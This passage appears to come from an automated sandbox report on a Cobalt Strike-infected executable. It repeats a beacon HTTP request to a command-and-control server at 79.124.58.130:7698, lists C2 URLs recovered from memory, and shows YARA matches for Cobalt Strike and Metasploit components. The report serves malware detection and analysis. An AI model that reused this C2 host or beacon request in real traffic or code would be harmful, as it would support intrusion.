Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache

Source: 2HSalvXIJE.exe, 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/aiHK
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/aiHK-369
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/aiHK4fI
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/aiHKl
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/aiHKn5#
Source: 2HSalvXIJE.exe, 00000000.00000003.1793433223.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.js
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.js8
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.js?
Source: 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsE
Source: 2HSalvXIJE.exe, 00000000.00000003.1917242500.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1886596298.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1927527147.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1906875201.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1896860921.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1876218840.0000000000189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsF
Source: 2HSalvXIJE.exe, 00000000.00000003.1739835417.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1749859098.0000000000189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsa
Source: 2HSalvXIJE.exe, 00000000.00000003.1917242500.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1834415462.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1886596298.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1844457425.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1927527147.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1866017243.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1855794849.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1906875201.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1896860921.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1876218840.0000000000189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsd
Source: 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsdows
Source: 2HSalvXIJE.exe, 00000000.00000003.1824484063.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1783330278.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1814491351.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1804094560.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1793433223.0000000000189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsg
Source: 2HSalvXIJE.exe, 00000000.00000003.1759970628.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1783330278.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1772648615.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1793433223.0000000000189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsh
Source: 2HSalvXIJE.exe, 00000000.00000003.1917242500.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1927527147.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1906875201.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1896860921.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1804094560.0000000000189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsk
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsm
Source: 2HSalvXIJE.exe, 00000000.00000003.2064909405.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.2237319191.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1759970628.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1739835417.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1783330278.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.2064841546.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1772648615.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1749859098.0000000000189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsn
Source: 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsq
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsra
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jssi
Source: 2HSalvXIJE.exe, 00000000.00000003.1739835417.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1749859098.0000000000189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsu
Source: 2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsw
Source: 2HSalvXIJE.exe, 00000000.00000003.2237319191.0000000000189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.58.130:7698/en_US/all.jsy

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
